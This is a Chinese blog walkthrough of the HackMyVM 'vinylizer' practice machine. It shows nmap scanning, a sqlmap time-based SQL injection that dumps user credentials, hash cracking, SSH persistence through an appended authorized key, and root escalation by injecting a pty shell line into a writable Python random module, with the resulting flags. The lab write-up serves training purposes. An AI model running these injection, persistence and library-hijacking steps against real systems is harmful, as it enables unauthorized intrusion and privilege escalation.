vinylizer - hackmyvm

最新推荐文章于 2024-10-31 17:14:12 发布
最新推荐文章于 2024-10-31 17:14:12 发布
阅读量193 收藏 1
点赞数 8
分类专栏: hackmyvm靶场合集 文章标签: 安全 linux 服务器 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/138294768
版权

简介

靶机名称:vinylizer

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=vinylizer

本地环境

虚拟机:vitual box

靶场IP(vinylizer):192.168.56.110

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

zenmap随便扫下

nmap -p 1-65535 -T4 -A -v 192.168.56.110/32

image-20240428212920080

22和80端口

http

唱片商场网页

image-20240428213033501

sql注入

可以看到有一个登录界面

image-20240428220941035

sqlmap一把梭。因为是时间盲注,所以可以把注入时间用--time-sec调短一点。要等很长时间……

python3 sqlmap.py -u "http://192.168.56.110/login.php" --data "login=&password=123&username=" -D  vinyl_marketplace -T users --dump-all  --risk 1 --time-sec 1

image-20240428222622406

[22:25:57] [INFO] 将哈希值写入临时文件 '/tmp/sqlmapqaim85il26926/sqlmaphashes-j41heunl.txt'
n
Database: vinyl_marketplace
Table: users
[2 entries]
+----+----------------------------------+-----------+----------------+
| id | password                         | username  | login_attempts |
+----+----------------------------------+-----------+----------------+
| 1  | 9432522ed1a8fca612b11c3980a031f6 | shopadmin | 0              |
| 2  | password123                      | lana      | 0              |
+----+----------------------------------+-----------+----------------+

hashcat配合kali字典成功爆出来shopadmin的密码为addicted2vinyl

image-20240428222956810

当然还有一种做法是cmd5爆米()

image-20240428223044408

使用该密码后成功用ssh登录目标服务器

image-20240428223500050

I_L0V3_V1NYL5

提权

先把公钥写进靶机ssh,方便后期连接

shopadmin@vinylizer:~$ cd .ssh
shopadmin@vinylizer:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQClvG6svC2GWmvvZyP2dF1aWWsyDEfwoSCkaleG/VK38Dpzu4agS5FGrkZa2bnebp8LB1mdwEyUr8eq1RcApIDn8jhVaShDNj9EffzzCQWWnJ/1pEXJqmhgjkUvW5LngLTyrsAL2y4ko/zSNY4mebJxnfDc/COjl4u5Rh3PoV0GktC3b+9q4b3InVYjfTVrX77zi30zFhrmYT+0xpjfc1PUFmAqXiLx/zfDBTBAgOTrRZ098XZA63YsLV1YCQxc9iyIjyqJUjXD5lq70oMbub264BREBTFILmdLJQjVwctr/NdDn9TIeFLNBDXZzCGkpqCBUG4+VaqXL/gpQUCb/cJj0UMJBmRXfS0ltt1cWUlYkUb34hlSSrnbtdFkZYfkoZnrrQvJw86pMSO5HJah7XnZUlXQ7w47tloh/u6EW+zo0Q96wQ+SvHRE+XnhgKjQhpmcGWkU0Kw9u34MKS8T3g1uptopuHpa/XhBLah7poRtAtJsDDbVjcxlIW6XS2HT61s= root@koishi-reverse" >> authorized_keys

sudo - l,看到利用点

shopadmin@vinylizer:~/.ssh$ sudo -l
Matching Defaults entries for shopadmin on vinylizer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User shopadmin may run the following commands on vinylizer:
    (ALL : ALL) NOPASSWD: /usr/bin/python3 /opt/vinylizer.py

这个脚本本身没啥利用,所以从它所使用的库文件入手

image-20240428230756950

这里选择random库进行攻击,直接写入shell

import pty;pty.spawn("/bin/bash");exit()

然后执行命令,成功提权

image-20240428231437573

4UD10PH1L3

古明地核
关注
专栏目录
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 6607
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
[HackMyVm] Vinulizer
qq_34942239的博客
03-13 257
usr/lib/python3.10/random.py是有修改权限的,正好又是导入的那个random模块。shopadmin的password经过md5解密得到addicted2vinyl。/opt/vinylizer.py有root权限。在login界面测试发现可以sql注入。打开发现引入json和random模块。但是文件不可修改,只能从模块下手。但是登录不上网页可以连接ssh。抓包放到sqlmap里面跑。lana登录发现没有东西。在import的下面加上。
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 737
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
安全知识见闻-脚本语言对与安全的重要性
2201_75446043的博客
10-27 1172
批处理文件是以.bat扩展名结尾的文本文件,其中包含一系列命令,通常用于自动化任务。在Windows操作系统中,批处理文件可以通过命令提示符(CMD)运行。PowerShell是微软推出的一种任务自动化和配置管理框架,结合了命令行界面和脚本语言的特性。它的命令称为“cmdlet”,支持对象导向,能够处理复杂的数据结构。编写宏病毒、脚本病毒、BIOS病毒或进行内网渗透都需要特定的技术知识和编程技能,类似的脚本病毒还有很多,无法一一列举。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1187
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
API接口开放与安全管控 - 原理与实践
whisperzzza的博客
10-27 1331
API安全是接口开放的前提条件 在API对外开放时,确保其安全性至关重要,因为API直接暴露给外部环境,容易成为攻击目标。一旦被恶意利用,可能导致数据泄露、服务滥用等严重后果。因此,通过API网关实施严格的接口安全管理措施,如身份验证、访问控制和流量限制,成为保护后端服务免受威胁的第一道防线。这不仅有助于维护系统的稳定性和可靠性,还能增强用户对平台的信任度。
【 纷享销客-注册安全分析报告-无验证方式导致安全隐患】
最新发布
10-31 523
纷享销客(北京易动纷享科技有限责任公司)总部位于北京市海淀区中关村,目前在北京、上海、广州、深圳、杭州、南京、武汉、成都、长沙、郑州、西安、济南、香港等13个城市设立直营省分公司,在全国50余个城市建立营销服务中心。截至目前,员工总数1000余人,产品研发团队300余人,是一家具备完善的研发、实施交付能力的优质SaaS企业。纷享销客以连接型CRM为特色,连接业务,连接人,连接系统,实现以客户为中心,企业内部和上下游业务的高效协作。
【商汤科技-注册/登录安全分析报告】
10-26 1602
作为人工智能软件公司,商汤科技以“坚持原创,让AI引领人类进步”为使命,旨在持续引领人工智能前沿研究,持续打造更具拓展性更普惠的人工智能软件平台,推动经济、社会和人类的发展,并持续吸引及培养顶尖人才,共同塑造未来。商汤科技拥有深厚的学术积累,并长期投入于原创技术研究,不断增强行业领先的多模态、多任务通用人工智能能力。
uaGate SI——实现OT与IT的安全连接
SoftingChina的博客
10-28 782
对于许多制造商来说,诸如工业物联网(IIoT)、信息物理系统(CPS)和大数据等概念已经开始与其智能工厂的愿景紧密相连。智能工厂是将信息技术(IT)的数字世界与运营技术(OT)的物理世界连接起来,也就是实现IT与OT的融合。
守护头顶安全——AI高空抛物监测,让悲剧不再重演
huaaoxikeji的博客
10-25 587
搭配AI算法的高空抛物监控,是制止高空抛物的重要手段之一。
安全性分析】正式安全分析与非正式安全分析
JingYan_Chan的博客
10-31 702
为实现网络安全目标,通常需要提出相关认证密钥协议(Authentication and Key Agreement Protocol, AKA)对网络通信进行保护。若设计的协议中出现安全漏洞,将导致网络容易收到安全攻击。所以我们需要对提出的协议进行安全性分析。安全性分析正式安全分析非正式安全分析。本章总结了安全性分析的两大类,接下来,我将详细介绍每一种安全性分析方法的详细分析过程。
安全成为大模型的核心;大模型安全的途径:大模型对齐
ZJQ的博客
10-28 233
DPO的工作原理是:通过利用奖励函数与最优策略之间的映射关系,证明这个受限的奖励最大化问题可以通过单阶段的策略训练来精确优化。综上所述,人类反馈强化学习(RLHF)和直接偏好优化(DPO)都是大模型对齐技术中的重要方法。DPO简化了RLHF的流程,将强化学习的训练阶段转化为一个二分类问题,从而减少了内存消耗并提高了训练稳定性。RLHF,即Reinforcement Learning from Human Feedback,是一种结合了机器学习中的强化学习算法与人类主观判断的训练技术。
Metasploit(MSF)使用
FFNCL的博客
10-28 812
Metasploit 是一个功能强大的渗透测试工具,广泛应用于安全领域。
Windows 安全日志解析
qq_38933606的博客
10-29 583
当Windows运行一个计划任务时,“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行,当这种登录出现时,Windows在日志中记为类型4。与计划任务类似,每种服务都被配置在某个特定的用户账户下运行,当一个服务开始时,Windows首先为这个特定的用户创建一个登录会话,这将被记为类型5。当离线设备使用域用户登录时,Windows将使用缓存的交互式域登录的凭证HASH来验证你的身份,这种情况下将登录记为类型11。不详,推测与类型11类似,适用于远程桌面的离线登录。
【深度学习】合合信息:生成式AI时代的内容安全与系统构建
Java 技术专栏,从入门到精通,熟悉企业级开发
10-28 5684
该公司所研发的基于深度学习的图像篡改检测技术以及相关系统,能够通过深入探究图像被篡改后统计特征所产生的变化,以智能化的手段精确捕捉到图像在篡改过程中遗留下来的细微痕迹,从而可以检测出例如复制粘贴、拼接、擦除等各式各样的篡改形式。本文中提及的人脸伪造检测、通用篡改检测、卡证篡改检测应用,都包含在TextIn智能文字识别产品里,这些应用基于合合自研AI检测系统,通过深度学习算法的高级特征提取和分析,对人脸、证照、卡证、扫描件等场景进行专项模型调优,实现高效、精准的检测。感兴趣的朋友们可以访问。
智慧用电监控装置:引领0.4kV安全用电新时代
Wcy1184638123的博客
10-29 324
采用了前沿的微控制器技术,实现了高度集成化设计,体积小巧,安装便捷,完美融入各类建筑环境,不影响美观的同时,提升了电力监控的智能化与数字化水平。装置将传统的RS485有线通讯方式全面升级为GPRS无线通讯,彻底摆脱了现场布线的束缚,不仅降低了施工难度与成本,还实现了远程监控与数据传输的即时性与灵活性,为电力管理人员提供了便捷与高效的管理。它不仅帮助用户实现了对电力系统的精准控制与高效管理,还通过数据分析与预测,为预防系统绝缘老化、优化能源配置提供了科学依据,助力企业节能减排,提升整体运营效率。
安全运营 -- 监控linux命令history
leeezp的博客
10-27 846
最近,有个IT的同事给我提了一个需求,说想监控/root/.ssh/ 文件夹下的文件变动,于是我灵机一动......
文件中台与安全:集成方案的探索与实践
Gokuai2024的博客
10-30 1032
在文件中台中,权限管理直接决定了文件的访问安全。通过使用智能化的威胁检测工具,监控系统中的不正常访问行为,如频繁的文件下载、大规模的文件删除等,企业可以在威胁事件升级前进行预防性处置,减少安全风险。够快云库的文件安全管理方案,通过完善的权限控制、实时监控和威胁检测功能,帮助企业在构建文件中台的同时,构筑文件数据的坚固防线,实现安全与效率的双重提升。在提供这些便利的同时,文件中台也带来了文件安全管理的巨大挑战,尤其是在面对不断增长的数据访问需求和分散的文件存储环境时,确保文件安全变得尤为重要。
【万兴科技-注册_登录安全分析报告】
10-27 943
AIGC软件A股上市公司万兴科技(300624.SZ),全球领先的新生代数字创意赋能者,致力于成为全世界范围内有特色、有影响力的百年软件老店。万兴科技深耕数字创意软件领域,并面向AIGC时代深度布局,旗下已推出万兴喵影、万兴播爆、万兴录演、万兴优转等视频创意软件,SelfyzAI、Pixpic、FaceHub、AniEraser等图片创意软件,亿图图示、亿图脑图、墨刀等绘图创意软件,以及万兴PDF等文档创意软件。
泷羽sec-安全见闻(9)
zhangqqa的博客
10-26 686
二进制安全是指在处理二进制数据时,确保数据的完整性、保密性和可用性,防止恶意攻击和数据篡改。American Fuzzy Lop(AFL)是一款非常流行的模糊测试工具,它能够高效地生成大量的随机输入数据,对程序进行测试。Peach Fuzzer也是一款功能强大的模糊测试工具,支持多种平台和协议。Metasploit 是一款广泛使用的漏洞利用框架,它提供了大量的漏洞利用模块和辅助工具,方便开发和执行漏洞利用代码。此外Exploit-DB 是一个漏洞利用代码库,可以从中查找和参考已有的漏洞利用代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值